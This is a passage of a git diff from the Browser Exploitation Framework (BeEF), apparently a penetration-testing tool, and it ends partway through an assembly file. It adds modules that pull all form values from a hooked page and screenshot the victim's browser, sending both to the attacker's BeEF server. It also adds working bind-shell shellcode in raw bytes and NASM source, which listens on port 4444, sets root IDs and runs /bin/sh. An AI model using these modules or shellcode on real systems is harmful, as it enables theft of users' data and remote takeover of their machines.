end
end

60
modules/browser/detect_unity/command.js Normal file
View File

@@ -0,0 +1,60 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var hasUnity = function() {
// Internet Explorer
if ( beef.browser.isIE() ) {
try {
var unity_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
} catch (e) { }
if ( unity_test ) {
return true;
}
// Not Internet Explorer
} else if ( navigator.mimeTypes && navigator.mimeTypes["application/vnd.unity"] ) {
if ( navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
navigator.plugins &&
navigator.plugins["Unity Player"] ) {
return true;
}
}
return false;
}
if ( hasUnity() ) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled");
if ( !beef.browser.isIE() ) {
var unityRegex = /Unity Web Player version (.*). \(c\)/g;
var match = unityRegex.exec(navigator.plugins["Unity Player"].description);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity version = "+ match[1]);
}
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is not enabled");
}
});

15
modules/browser/detect_unity/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Detect_unity:
enable: true
category: "Browser"
name: "Detect Unity Web Player"
description: "Detects Unity Web Player."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/browser/detect_unity/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_unity < BeEF::Core::Command
def post_execute
content = {}
content['unity'] = @datastore['unity']
save content
end
end

3
modules/browser/hooked_domain/deface_web_page/module.rb
View File

@@ -7,7 +7,8 @@ class Deface_web_page < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
return [
{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },

28
modules/browser/hooked_domain/get_form_values/command.js Normal file
View File

@@ -0,0 +1,28 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var form_data = new Array();
// loop through all forms
for (var f=0; f < document.forms.length; f++) {
// store type,name,value for all input fields
for (var i=0; i < document.forms[f].elements.length; i++) {
form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
}
}
// return form data
if (form_data.length) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
// return if no input fields were found
} else {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
}
});

8
modules/exploits/zenoss_daemon_csrf/config.yaml → modules/browser/hooked_domain/get_form_values/config.yaml
View File

@@ -5,11 +5,11 @@
#
beef:
module:
zenoss_daemon_csrf:
get_form_values:
enable: true
category: "Exploits"
name: "Zenoss 3.x Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
category: ["Browser", "Hooked Domain"]
name: "Get Form Values"
description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
authors: ["bcoles"]
target:
working: ["ALL"]

14
modules/browser/hooked_domain/get_form_values/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Get_form_values < BeEF::Core::Command
def post_execute
content = {}
content['form_data'] = @datastore['form_data']
save content
end
end

13
modules/browser/hooked_domain/get_page_html/command.js
View File

@@ -6,18 +6,7 @@
beef.execute(function() {
try {
var html_head = document.head.innerHTML.toString();
} catch (e) {
var html_head = "Error: document has no head";
}
try {
var html_body = document.body.innerHTML.toString();
} catch (e) {
var html_body = "Error: document has no body";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+beef.browser.getPageHead()+'&body='+beef.browser.getPageBody());
});

3
modules/browser/hooked_domain/get_stored_credentials/module.rb
View File

@@ -7,7 +7,8 @@ class Get_stored_credentials < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
return [
{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' }
]

3
modules/browser/hooked_domain/site_redirect_iframe/module.rb
View File

@@ -7,7 +7,8 @@ class Site_redirect_iframe < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
return [
{ 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },

3
modules/browser/play_sound/module.rb
View File

@@ -9,8 +9,9 @@ class Play_sound < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
sound_file_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
sound_file_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
return [{
'name' => 'sound_file_uri',

22
modules/browser/spyder_eye/command.js Normal file
View File

@@ -0,0 +1,22 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var script = document.createElement( 'script' );
script.type = 'text/javascript';
script.src = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/html2canvas.js';
$j("body").append( script );
html2canvas(document.body, {
onrendered: function(canvas) {
var img = canvas.toDataURL("image/png");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+img);
//beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=All done");
}
});
});

31
modules/browser/spyder_eye/config.yaml Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
spyder_eye:
enable: true
category: "Browser"
name: "Spyder Eye"
description: "This module takes a picture of the victim's browser window."
authors: ["preth00nker"]
target:
working:
IE:
min_ver: 9
max_ver: latest
FF:
min_ver: 3
max_ver: latest
C:
min_ver: 1
max_ver: latest
S:
min_ver: 6
max_ver: latest
O:
min_ver: 12
max_ver: latest
not_working: ["All"]

2841
modules/browser/spyder_eye/html2canvas.js Normal file
View File

File diff suppressed because it is too large Load Diff

35
modules/browser/spyder_eye/module.rb Normal file
View File

@@ -0,0 +1,35 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Spyder_eye < BeEF::Core::Command
require 'base64'
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.js', '/html2canvas', 'js')
end
def post_execute
content = {}
content['results'] = @datastore['results'] if not @datastore['results'].nil?
save content
# save screenshot file
begin
filename = "screenshot_#{Integer(@datastore['cid'])}.png"
File.open(filename, 'wb') do |file|
data = @datastore['results'].gsub(/^image=data:image\/(png|jpg);base64,/, "")
file.write(Base64.decode64(data))
end
print_info("Browser screenshot saved to '#{filename}'")
BeEF::Core::Logger.instance.register("Zombie", "Browser screenshot saved to '#{filename}'")
rescue Exception => e
print_error("Could not write screenshot file '#{filename}' - Exception: #{e.message}")
end
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/html2canvas.js')
end
end

4
modules/browser/webcam/command.js
View File

@@ -43,10 +43,10 @@ beef.execute(function() {
theHead.appendChild(style);
//A nice library that helps us to include the swf file
var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
var swfobject_script = '<script type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Empty body first
$j('body').html('');

4
modules/browser/webcam_permission_check/command.js
View File

@@ -62,10 +62,10 @@ beef.execute(function() {
});
//A library that helps include the swf file
//var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//var swfobject_script = '<script type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
//var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Add flash content

2
modules/chrome_extensions/inject_beef/command.js
View File

@@ -6,7 +6,7 @@
beef.execute(function() {
var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
var beefHookUri = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
chrome.windows.getAll({"populate" : true}, function(windows) {
for(i in windows) {

3
modules/debug/test_http_bind_raw/module.rb
View File

@@ -7,7 +7,8 @@ class Test_http_bind_raw < BeEF::Core::Command
def pre_send
configuration = BeEF::Core::Configuration.instance
xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
end

7
modules/exploits/beefbind/beef_bind_shell/command.js
View File

@@ -9,6 +9,7 @@ beef.execute(function () {
var rport = '<%= @rport %>';
var path = '<%= @path %>';
var cmd = '<%= @cmd %>';
var shellcode ='<%= @shellcode %>';
var uri = "http://" + rhost + ":" + rport + path;
@@ -73,7 +74,11 @@ beef.execute(function () {
};
xhr.open("POST", uri, false);
xhr.setRequestHeader("Content-Type", "text/plain");
command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
if (shellcode == 'Linux'){
command = "cmd=" + command + "\n"; // very important only LF
}else{
command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
}
xhr.send(command);
setTimeout("get_additional_cmd_results()",500);
};

6
modules/exploits/beefbind/beef_bind_shell/module.rb
View File

@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
{ 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
{ 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
}
]
end

3
modules/exploits/beefbind/beef_bind_staged_deploy/command.js
View File

@@ -13,6 +13,7 @@ beef.execute(function () {
var beef_host = '<%= @beef_host %>';
var beef_port = '<%= @beef_port %>';
var beef_proto = beef.net.httpproto;
var beef_junk_port = '<%= @beef_junk_port %>';
var sock_name = '<%= @beef_junk_socket %>';
@@ -190,7 +191,7 @@ beef.execute(function () {
var size,host,contenttype,referer,nops = null;
get_junk_size = function(){
var junk_name = "";
var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
var uri = beef_proto + "://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
$j.ajax({
type: "GET",

27
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c Executable file
View File

@@ -0,0 +1,27 @@
/**
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
#gcc -fno-stack-protector -z execstack -o socket64 socket64.c
**/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = (int(*)())ptr;
(void)((void(*)())ptr)();
printf("\n");
return 0;
}

285
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm Executable file
View File

@@ -0,0 +1,285 @@
BITS 64
SECTION .text
global _start
_start:
cld ;clear direction flag
xor rdx,rdx ;zero rdx
push BYTE 0x02
pop r14
;create two pipes
createpipes:
push rdx ;allocate space on the stack
mov rdi, rsp ;point to the stack
push BYTE 0x16
pop rax ;sys_pipe
syscall
dec r14
test r14, r14 ;create 2 pipes
je endcreatepipes
jmp createpipes
endcreatepipes:
;sys_fork
push BYTE 0x39
pop rax
syscall
cmp eax, 0x00 ;parent or child?
je child
xor rdi, rdi ; zero rdi
mov edi, DWORD [rsp+0x8] ; close read end of one pipe
push BYTE 0x03
pop rax ;sys_close
syscall
mov edi, DWORD [rsp+0x4] ;close write end of the other pipe
push BYTE 0x03
pop rax ;sys_close
syscall
;make non-blocking
mov edi, DWORD [rsp] ;fd
push BYTE 0x04
pop rsi ;F_SETFL
xor rdx, rdx
mov rdx, 0x800 ;O_NONBLOCK
push BYTE 0x48
pop rax ; sys_fcntl
syscall
;allocate one page of memory
xor rdi,rdi ;system determines location
push 0x1000 ;allocated size
pop rsi
push BYTE 0x07
pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
push BYTE 0x22
pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
push rdi
push rdi
pop r9 ;offset
pop r8 ;fd
push BYTE 0x09
pop rax
syscall
mov r14, rax ;save pointer allocated memory for later use
doforever:
;initialize socket
xor rdx, rdx ;zero rdx (proto =0)
push BYTE 0x01
pop rsi ;SOCK_STREAM
push BYTE 0x02
pop rdi ;AF_INET = 2
push BYTE 0x29
pop rax ;sys_socket
syscall
mov rbx, rax ; save socket filediscriptor
;reuse socket
push 0x01 ;true
mov r10, rsp ;ptr to optval
push BYTE 0x08
pop r8 ;sizeof socklen_t
push BYTE 0x02
pop rdx ;SO_REUSEADDR = 2
push BYTE 0x01
pop rsi ;SOL_SOCKET = 1
mov rdi, rbx ;socketfd
push BYTE 0x36 ;sys_setsockopt
pop rax
syscall
pop rax ;clean stack
;bind socket to port
xor rax,rax
push BYTE 0x10
pop rdx ;addrlen
push rax
push rax
mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 4444
mov rsi, rsp ;ptr to sokaddr
mov rdi, rbx ;socketfd
push BYTE 0x31
pop rax ;sys_bind
syscall
pop rax ;clean stack
pop rax
;listen
xor rsi, rsi ;backlog ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x32
pop rax ;sys_listen
syscall
;accept
xor rdx,rdx ;addrlen ptr = NULL
xor rsi,rsi ;sockaddr ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x2b
pop rax ;sys_accept
syscall
mov r15, rax ;save client socket fd for later use
;close serversocket
mov rdi, rbx ;close server socket fd
push BYTE 0x03
pop rax ;sys_close
syscall
mov rcx, 0x1000 ;pagesize
firstzeromemory:
;zero out memory
dec rcx
mov rbx, r14
add rbx, rcx
mov BYTE [rbx], 0x00
jrcxz readfromsocket
jmp firstzeromemory
readfromsocket:
xor rdx, rdx
;read into allocated memory
mov rdi, r15 ;client socketfd
mov rsi, r14 ;ptr to allocated memory
mov dx, 0x400 ;read 1024 bytes
push BYTE 0x00
pop rax ;sys_read
syscall
mov rcx, 0x400 ;search in 1024 bytes
mov rbx, r14 ;ptr to allocated memory
search:
cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd="
je found ;cmd= found
inc rbx
dec rcx
jrcxz notfound ;cmd= not in recieved buffer
jmp search ;search some more
found:
xor rdi, rdi
mov rcx, rbx
add rcx, 0x03 ;skip "cmd"
mov rsi, rcx
mov edi, DWORD [rsp+0xC] ;write to pipe
sendcommand:
inc rsi ;first time skip "=", move to next byte
push BYTE 0x01
pop rdx ;write one byte
push BYTE 0x01
pop rax ;sys_write
syscall
cmp BYTE [rsi], 0x0a ;LF character?
jne sendcommand ;else continue write to pipe
;sleep one second
push BYTE 0x23
pop rax ;sys_nanosleep
push DWORD 0x00
push DWORD 0x01 ;one second
mov rdi, rsp ;ptr to argument array
xor rsi, rsi ;NULL
syscall
pop rax ;clean stack
pop rax
notfound:
call writehttpheaders
db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a
db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a
writehttpheaders:
pop rsi ;source address saved by call
mov rdi, r14 ;ptr to allocated memory
add rdi, 0x400 ;skip 1024 bytes
mov rcx, 0x62 ;copy 98 bytes
rep movsb
xor rdi, rdi ;zero rdi
mov edi, DWORD [rsp] ;read from pipe
mov rsi, r14 ;ptr to allocated memory
add rsi, 0x400 ;skip 1024 bytes
add rsi, 0x62 ;skip header
mov rdx, 0xb86 ;read max 2950 bytes
xor rax,rax ;sys_read
syscall
mov rdi, r15 ;clientsocket fd
mov rsi, r14 ;ptr to allocated memory
add rsi, 0x400 ;skip 1024 first bytes
mov rdx, 0xbe8 ;send max 3048 bytes
push BYTE 0x01
pop rax ;sys_write
syscall
mov rdi, r15 ;close clientsocket fd
push BYTE 0x03
pop rax ;sys_close
syscall
jmp doforever
child:
xor rdi, rdi
mov edi, DWORD [rsp+0xc] ;close output side of pipe
push BYTE 0x03
pop rax ;sys_close
syscall
xor rdi, rdi ;close stdin
push BYTE 0x03
pop rax ;sys_close
syscall
mov edi, DWORD [rsp+0x08] ;dup input side to stdin
push BYTE 0x20
pop rax ;sys_dup
syscall
mov edi, DWORD [rsp] ;close input side of other pipe
push BYTE 0x03
pop rax ;sys_close
syscall
xor rdi, rdi
inc rdi ;close stdout
push BYTE 0x03
pop rax ;sys_close
syscall
mov edi, DWORD [rsp+0x4] ;dup output side to stdout
push BYTE 0x20
pop rax ;sys_dup
syscall
;setresuid(0,0,0)
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
push BYTE 0x75
pop rax ;sys_resuid
syscall
push BYTE 0x3b
pop rax ;sys_execve
mov rdi, 0x0068732f6e69622f ;/bin/shNULL
push rdi ;push to stack
mov rdi, rsp ;ptr to stack
xor rsi, rsi ;NULL
xor rdx, rdx ;NULL
syscall

106
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm Executable file
View File

@@ -0,0 +1,106 @@
BITS 64
SECTION .text
global _start
_start:
cld ;clear direction flag
xor rdx, rdx ;zero rdx (proto=0)
push BYTE 0x01
pop rsi ;SOCK_STREAM
push BYTE 0x02
pop rdi ;AF_INET = 2
push BYTE 0x29
pop rax ;sys_socket
syscall
mov rbx, rax ; save socket filediscriptor
;reuse socket
push 0x01 ;true
mov r10, rsp ;ptr to optval
push BYTE 0x08
pop r8 ;sizeof socklen_t
push BYTE 0x02
pop rdx ;SO_REUSEADDR = 2
push BYTE 0x01
pop rsi ;SOL_SOCKET = 1
mov rdi, rbx ;socketfd
push BYTE 0x36 ;sys_setsockopt
pop rax
syscall
xor rax,rax
push BYTE 0x10
pop rdx ;addrlen
push rax
push rax
mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444
mov rsi, rsp ;ptr to sokaddr
mov rdi, rbx ;socketfd
push BYTE 0x31
pop rax ;sys_bind
syscall
xor rsi, rsi ;backlog ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x32
pop rax ;sys_listen
syscall
;accept
xor rdx,rdx ;addrlen ptr = NULL
xor rsi,rsi ;sockaddr ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x2B
pop rax ;sys_accept
syscall
mov r15, rax ;save client socket fd for later use
mov rdi, rbx ;close server socket fd
push BYTE 0x03
pop rax ;sys_close
syscall
;allocate memory
xor rdi,rdi ;system determines location
push 0x1000 ;allocated size
pop rsi
push BYTE 0x07
pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
push BYTE 0x22
pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
push rdi
push rdi
pop r9 ;offset
pop r8 ;fd
push BYTE 0x09
pop rax
syscall
mov r14, rax ;save pointer allocated memory for later use
;read into allocated memory
mov rdi, r15 ;client socketfd
mov rsi, r14 ;ptr to allocated memory
mov dx, 0x1000 ;read one page of memory
push BYTE 0x00
pop rax ;sys_read
syscall
;close clientsocketfd
mov rdi, r15 ;client socketfd
push BYTE 0x03
pop rax ;sys_close
syscall
mov rsi, r14 ;ptr to allocated memory
search:
cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd="
je short found ;cmd= found
inc rsi
jmp short search ;search some more
found:
push BYTE 0x04 ;skip "cmd="
pop rax
add rsi, rax
jmp rsi ;jump to stage

27
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c Normal file
View File

@@ -0,0 +1,27 @@
/**
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
#gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
**/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = (int(*)())ptr;
(void)((void(*)())ptr)();
printf("\n");
return 0;
}

290
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm Normal file
View File

@@ -0,0 +1,290 @@
; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
; Browser Exploitation Framework (BeEF) - http://beefproject.com
; See the file 'doc/COPYING' for copying permission
BITS 32
SECTION .text
global _start
_start:
cld ;clear direction flag
xor edx, edx ;zero edx
push BYTE 0x02
pop ecx
;create two pipes
createpipes:
push edx ;allocate space on stack
push edx
mov ebx, esp ; ptr to argument array
push BYTE 0x2A ;sys_pipe
pop eax
int 0x80 ;syscall
dec ecx
jcxz endcreatepipes ;jmp when both pipes are created
jmp short createpipes ;create next pipe
endcreatepipes:
;create fork
xor ebx, ebx ;zero ebx
push BYTE 0x02 ;sys_fork
pop eax
int 0x80 ;syscall
cmp eax, 0x00 ;parent or child
je child
mov ebx, [esp+0x8] ;close read end of one pipe
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov ebx, [esp+0x4] ;close write end of the other pipe
push BYTE 0x06 ;sys_close
pop eax
int 0x80
; make non blocking
mov ebx, [esp] ;fd
push BYTE 0x04 ;F_SETFL
pop ecx
